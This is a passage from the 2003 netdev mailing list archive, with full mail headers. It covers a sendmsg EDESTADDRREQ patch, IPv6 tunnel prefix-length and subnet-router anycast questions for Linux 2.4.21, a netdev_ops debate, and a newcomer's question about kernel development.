h6B0b1Bo009650; Fri, 11 Jul 2003 09:37:01 +0900 Date: Fri, 11 Jul 2003 09:37:01 +0900 (JST) Message-Id: <20030711.093701.109452621.yoshfuji@linux-ipv6.org> To: davem@redhat.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Cc: tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3930 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030711.093546.12708723.yoshfuji@linux-ipv6.org> (at Fri, 11 Jul 2003 09:35:46 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > In article <20030710233223.GA30577@rei.rakuen> (at Fri, 11 Jul 2003 01:32:23 +0200), Thomas Graf says: > > > [EDESTADDRREQ] > > The socket is not connection-mode and does not have its peer > > address set, and no destination address was specified. > > > > fixes sendmsg in ipv{4,6}/{raw,udp} > > I aggeed on this, however we may want to do for whole tree at same time. ~~~~~~agreed > How do you think, folks? --yoshfuji From davem@redhat.com Thu Jul 10 17:37:54 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:37:56 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0br2x030770 for ; Thu, 10 Jul 2003 17:37:54 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28164; Thu, 10 Jul 2003 17:29:23 -0700 Date: Thu, 10 Jul 2003 17:29:23 -0700 (PDT) Message-Id: <20030710.172923.27804984.davem@redhat.com> To: yoshfuji@linux-ipv6.org Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: "David S. Miller" In-Reply-To: <20030711.093546.12708723.yoshfuji@linux-ipv6.org> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3931 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: YOSHIFUJI Hideaki / $B5HF#1QL@(B Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) I aggeed on this, however we may want to do for whole tree at same time. How do you think, folks? Sure, just send more patches relative to this one :-) From davem@redhat.com Thu Jul 10 17:38:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:38:10 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0c62x030799 for ; Thu, 10 Jul 2003 17:38:06 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id RAA28173; Thu, 10 Jul 2003 17:29:36 -0700 Date: Thu, 10 Jul 2003 17:29:35 -0700 (PDT) Message-Id: <20030710.172935.77037127.davem@redhat.com> To: tgraf@suug.ch Cc: netdev@oss.sgi.com Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: "David S. Miller" In-Reply-To: <20030710233223.GA30577@rei.rakuen> References: <20030710233223.GA30577@rei.rakuen> X-FalunGong: Information control. X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3932 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Thomas Graf Date: Fri, 11 Jul 2003 01:32:23 +0200 [EDESTADDRREQ] The socket is not connection-mode and does not have its peer address set, and no destination address was specified. fixes sendmsg in ipv{4,6}/{raw,udp} Applied, thanks Thomas. From yoshfuji@linux-ipv6.org Thu Jul 10 17:40:05 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 17:40:08 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B0e32x031393 for ; Thu, 10 Jul 2003 17:40:04 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B0faBo013245; Fri, 11 Jul 2003 09:41:37 +0900 Date: Fri, 11 Jul 2003 09:41:36 +0900 (JST) Message-Id: <20030711.094136.38023048.yoshfuji@linux-ipv6.org> To: davem@redhat.com Cc: netdev@oss.sgi.com, tgraf@suug.ch Subject: Re: [PATCH] make sendmsg return EDESTADDRREQ if socket is not connected and daddr was not specified From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710.172923.27804984.davem@redhat.com> References: <20030710233223.GA30577@rei.rakuen> <20030711.093546.12708723.yoshfuji@linux-ipv6.org> <20030710.172923.27804984.davem@redhat.com> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3933 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710.172923.27804984.davem@redhat.com> (at Thu, 10 Jul 2003 17:29:23 -0700 (PDT)), "David S. Miller" says: > From: YOSHIFUJI Hideaki / $B5HF#1QL@(B > Date: Fri, 11 Jul 2003 09:35:46 +0900 (JST) > > I aggeed on this, however we may want to do for whole tree at same time. > How do you think, folks? > > Sure, just send more patches relative to this one :-) Okay, I'll do this as much as I can do... --yoshfuji From andre@tomt.net Thu Jul 10 18:49:13 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 18:49:21 -0700 (PDT) Received: from mail.skjellin.no (qmailr@mail.skjellin.no [80.239.42.67]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B1nB2x032162 for ; Thu, 10 Jul 2003 18:49:13 -0700 Received: (qmail 31648 invoked by uid 1006); 11 Jul 2003 01:54:08 -0000 Received: from andre@tomt.net by ns1 by uid 1003 with qmail-scanner-1.16 (sophie: 2.14/3.69. spamassassin: 2.55. Clear:. Processed in 0.024238 secs); 11 Jul 2003 01:54:08 -0000 Received: from slask.tomt.net (HELO slurv.pasop.tomt.net) (andre@tomt.net@217.8.136.222) by mail.skjellin.no with SMTP; 11 Jul 2003 01:54:08 -0000 Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Andre Tomt To: linux-kernel@vger.kernel.org Cc: Mika Liljeberg , netdev@oss.sgi.com In-Reply-To: <1057881869.3588.10.camel@hades> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> Content-Type: text/plain; charset=ISO-8859-1 Message-Id: <1057888154.26854.324.camel@localhost> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 03:49:14 +0200 Content-Transfer-Encoding: 8bit X-archive-position: 3934 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andre@tomt.net Precedence: bulk X-list: netdev On fre, 2003-07-11 at 02:04, Mika Liljeberg wrote: > Well, the thing is that prefix:: is a special anycast address that > identifies a router on the link prefix::/n, where n is the prefix > length. You had configured a 127-bit link prefix, meaning that you had > only one valid unicast address (last bit == 1) in addition to the router > anycast address (last bit == 0). Thanks for the explanation, I've been struggling to understand what Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs introduced in 2.4.21" - ie. my bogus bugreport), now it all makes perfect sense :-) > Normally, IPv6 networks are supposed to use 64-bit on-link prefixes but > the implementation can be written in such a way that other prefix > lengths can be configured. > > Setting your tunnel prefix to /64 is certainly the right thing to do. If you don't have anything but one /64 for example.. I guess /126's would be ok as you could rule out the the anycast address? It will probably work with Linux - but is it wrong in any sense, other than "breaking" with EUI-64/autoconfiguration? -- Cheers, André Tomt andre@tomt.net From yoshfuji@linux-ipv6.org Thu Jul 10 19:02:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 19:02:33 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B22R2x032572 for ; Thu, 10 Jul 2003 19:02:28 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B23wBo016296; Fri, 11 Jul 2003 11:03:58 +0900 Date: Fri, 11 Jul 2003 11:03:58 +0900 (JST) Message-Id: <20030711.110358.32018240.yoshfuji@linux-ipv6.org> To: andre@tomt.net Cc: linux-kernel@vger.kernel.org, mika.liljeberg@welho.com, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling broken From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <1057888154.26854.324.camel@localhost> References: <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> <1057888154.26854.324.camel@localhost> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3935 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <1057888154.26854.324.camel@localhost> (at 11 Jul 2003 03:49:14 +0200), Andre Tomt says: > Thanks for the explanation, I've been struggling to understand what > Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs > introduced in 2.4.21" - ie. my bogus bugreport), now it all makes > perfect sense :-) Sorry for my poor explanation... > If you don't have anything but one /64 for example.. I guess /126's > would be ok as you could rule out the the anycast address? It will > probably work with Linux - but is it wrong in any sense, other than > "breaking" with EUI-64/autoconfiguration? I don't think so, but I won't recoomend doing this. (I even don't assign global addresses to p-t-p interface at all.) --yoshfuji From mika.liljeberg@welho.com Thu Jul 10 19:03:32 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 19:03:36 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B23U2x032753 for ; Thu, 10 Jul 2003 19:03:32 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B23wZj008552; Fri, 11 Jul 2003 05:03:58 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B23v3B008551; Fri, 11 Jul 2003 05:03:57 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Andre Tomt Cc: linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: <1057888154.26854.324.camel@localhost> References: <20030710154302.GE1722@zip.com.au> <1057854432.3588.2.camel@hades> <20030710233931.GG1722@zip.com.au> <1057881869.3588.10.camel@hades> <1057888154.26854.324.camel@localhost> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057889037.3589.42.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 05:03:57 +0300 X-archive-position: 3936 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 04:49, Andre Tomt wrote: > > Setting your tunnel prefix to /64 is certainly the right thing to do. > > If you don't have anything but one /64 for example.. I guess /126's > would be ok as you could rule out the the anycast address? It will > probably work with Linux - but is it wrong in any sense, other than > "breaking" with EUI-64/autoconfiguration? It doesn't really make sense to use a prefix longer then /64. The last 64 bits are generally reserved for interface ID. What you can do, though, is not configure a link prefix for the tunnel at all. I.e. you can add the local tunnel end-point as a /128. This won't create an on-link route in the routing table, so you need to point the default route to the interface rather than the peer end-point. For example: ifconfig sit0 add 3ffe:dead:beef::dead:beef/128 ip route add ::/0 dev sit0 Cheers, MikaL From jgarzik@pobox.com Thu Jul 10 21:52:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 21:52:54 -0700 (PDT) Received: from www.linux.org.uk (IDENT:/g2yAGj+1DI8JD4+8VH2VBFWXbGubaom@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B4qn2x002866 for ; Thu, 10 Jul 2003 21:52:50 -0700 Received: from rdu26-227-011.nc.rr.com ([66.26.227.11] helo=pobox.com) by www.linux.org.uk with esmtp (Exim 4.14) id 19am9v-0006yS-GS; Fri, 11 Jul 2003 01:53:11 +0100 Message-ID: <3F0E0A6C.5000703@pobox.com> Date: Thu, 10 Jul 2003 20:53:00 -0400 From: Jeff Garzik Organization: none User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021213 Debian/1.2.1-2.bunk X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: scott.feldman@intel.com, willy@debian.org, netdev@oss.sgi.com Subject: Re: [PATCH] netdev_ops References: <20030710.133737.41660806.davem@redhat.com> In-Reply-To: <20030710.133737.41660806.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3938 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: "Feldman, Scott" > Date: Thu, 10 Jul 2003 01:18:50 -0700 > > With HAVE_NETDEV_OPS, you're right, we're maintaining the wrapper > code outside the kernel. But, it does leave the possibility of > having a shared backwards compatibility code for multiple (all?) > drivers for those stuck with supporting kernels without netdev_ops. > > And precisely I am showing you how all this backwards compat > stuff is going to hurt you. You can never truly take advantage > of things that eliminate duplicated code in all the drivers, > and this netdev_ops case is a great example. Actually there is a solution that IMO will make everybody happy. Lemme finish writing up my comments to Matthew... Jeff From pekkas@netcore.fi Thu Jul 10 21:52:08 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 21:52:12 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B4q62x002808 for ; Thu, 10 Jul 2003 21:52:07 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B4pu324776; Fri, 11 Jul 2003 07:51:57 +0300 Date: Fri, 11 Jul 2003 07:51:56 +0300 (EEST) From: Pekka Savola To: Andre Tomt cc: linux-kernel@vger.kernel.org, Mika Liljeberg , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057888154.26854.324.camel@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3937 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Andre Tomt wrote: > On fre, 2003-07-11 at 02:04, Mika Liljeberg wrote: > > Well, the thing is that prefix:: is a special anycast address that > > identifies a router on the link prefix::/n, where n is the prefix > > length. You had configured a 127-bit link prefix, meaning that you had > > only one valid unicast address (last bit == 1) in addition to the router > > anycast address (last bit == 0). > > Thanks for the explanation, I've been struggling to understand what > Yoshfuji tried to explain to me earlier on this topic (see "IPv6 bugs > introduced in 2.4.21" - ie. my bogus bugreport), now it all makes > perfect sense :-) Well, the system may make some sense, but IMHO, there is still zero sense in policing this thing when you add a route. That's just plain bogus. This is a bug which must be fixed ASAP. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 10 22:19:37 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:19:45 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5JZ2x003553 for ; Thu, 10 Jul 2003 22:19:37 -0700 Received: from hades.pp.htv.fi (localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6B5K1Zj009247; Fri, 11 Jul 2003 08:20:01 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6B5K0Wc009227; Fri, 11 Jul 2003 08:20:00 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: Mika Liljeberg To: Pekka Savola Cc: Andre Tomt , linux-kernel@vger.kernel.org, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1057900800.3588.50.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 11 Jul 2003 08:20:00 +0300 X-archive-position: 3939 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > Well, the system may make some sense, but IMHO, there is still zero sense > in policing this thing when you add a route. That's just plain bogus. > This is a bug which must be fixed ASAP. Correct me if I'm wrong but I think in this case the interface had forwarding enabled and the sanity check in fact prevented a default route pointing to the node itself from being configured. Otherwise I fully agree. The subnet router anycast address doesn't warrant any special handling. MikaL From pekkas@netcore.fi Thu Jul 10 22:22:53 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:22:57 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5Mp2x003867 for ; Thu, 10 Jul 2003 22:22:52 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B5Meb24998; Fri, 11 Jul 2003 08:22:40 +0300 Date: Fri, 11 Jul 2003 08:22:39 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: Andre Tomt , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <1057900800.3588.50.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3940 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 11 Jul 2003, Mika Liljeberg wrote: > On Fri, 2003-07-11 at 07:51, Pekka Savola wrote: > > Well, the system may make some sense, but IMHO, there is still zero sense > > in policing this thing when you add a route. That's just plain bogus. > > This is a bug which must be fixed ASAP. > > Correct me if I'm wrong but I think in this case the interface had > forwarding enabled and the sanity check in fact prevented a default > route pointing to the node itself from being configured. > > Otherwise I fully agree. The subnet router anycast address doesn't > warrant any special handling. If that's the case, it's OK -- it's OK, I don't remember the details. (It might be nice to have configurable /proc option on whether to enable the subnet router anycast address at all, but that's also a different story..) -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From cip_tech@yahoo.com Thu Jul 10 22:29:27 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:29:30 -0700 (PDT) Received: from web14511.mail.yahoo.com (web14511.mail.yahoo.com [216.136.226.29]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5TQ2x004198 for ; Thu, 10 Jul 2003 22:29:27 -0700 Message-ID: <20030711052926.10588.qmail@web14511.mail.yahoo.com> Received: from [193.231.184.146] by web14511.mail.yahoo.com via HTTP; Thu, 10 Jul 2003 22:29:26 PDT Date: Thu, 10 Jul 2003 22:29:26 -0700 (PDT) From: cip m Subject: Beginner To: netdev@oss.sgi.com MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-551772643-1057901366=:9880" X-archive-position: 3941 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: cip_tech@yahoo.com Precedence: bulk X-list: netdev --0-551772643-1057901366=:9880 Content-Type: text/plain; charset=us-ascii Hi, Can somebody please help me ? I want to become a linux developer and I ned few tips about what languages I need to know and what other knowledge do I need ? Thank's CIPRIAN --------------------------------- Do you Yahoo!? SBC Yahoo! DSL - Now only $29.95 per month! --0-551772643-1057901366=:9880 Content-Type: text/html; charset=us-ascii

Hi,

Can somebody please help me ?

I want to become a linux developer and I ned few tips about what languages I need to know and what other knowledge do I need ?

Thank's

CIPRIAN


Do you Yahoo!?
SBC Yahoo! DSL - Now only $29.95 per month! --0-551772643-1057901366=:9880-- From yoshfuji@linux-ipv6.org Thu Jul 10 22:37:59 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 10 Jul 2003 22:38:03 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B5bv2x004539 for ; Thu, 10 Jul 2003 22:37:58 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B5dQBo018975; Fri, 11 Jul 2003 14:39:26 +0900 Date: Fri, 11 Jul 2003 14:39:26 +0900 (JST) Message-Id: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <1057900800.3588.50.camel@hades> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on XEmacs 21.4.6 (Common Lisp) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3942 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article (at Fri, 11 Jul 2003 08:22:39 +0300 (EEST)), Pekka Savola says: > (It might be nice to have configurable /proc option on whether to enable > the subnet router anycast address at all, but that's also a different > story..) I don't like this while I would be ok to have configuration option not to support anycast. --yoshfuji From pekkas@netcore.fi Fri Jul 11 01:46:17 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 01:46:26 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B8kF2x006679 for ; Fri, 11 Jul 2003 01:46:16 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6B8k1826465; Fri, 11 Jul 2003 11:46:01 +0300 Date: Fri, 11 Jul 2003 11:46:00 +0300 (EEST) From: Pekka Savola To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: mika.liljeberg@welho.com, , , Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked In-Reply-To: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 X-archive-position: 3943 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On Fri, 11 Jul 2003, YOSHIFUJI Hideaki / [iso-2022-jp] $B5HF#1QL@(B wrote: > In article (at Fri, 11 Jul 2003 08:22:39 +0300 (EEST)), Pekka Savola says: > > > (It might be nice to have configurable /proc option on whether to enable > > the subnet router anycast address at all, but that's also a different > > story..) > > I don't like this > while I would be ok to have configuration option > not to support anycast. With "not to support anycast" you probably meant "not to support subnet-router anycast address [automatically, in the kernel, as now]" ? These are entirely different things. (Note that if there's a user-level API for setting anycast addresses, one could kick the subnet-router anycast address out of the kernel too. Whether that's desirable is another thing.) -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 11 02:03:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 11 Jul 2003 02:03:27 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6B93J2x007136 for ; Fri, 11 Jul 2003 02:03:20 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6B94nBo020844; Fri, 11 Jul 2003 18:04:49 +0900 Date: Fri, 11 Jul 2003 18:04:49 +0900 (JST) Message-Id: <20030711.180449.126456521.yoshfuji@linux-ipv6.org> To: pekkas@netcore.fi Cc: mika.liljeberg@welho.com, andre@tomt.net, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: 2.4.21+ - IPv6 over IPv4 tunneling b0rked From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: References: <20030711.143926.599349332.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: 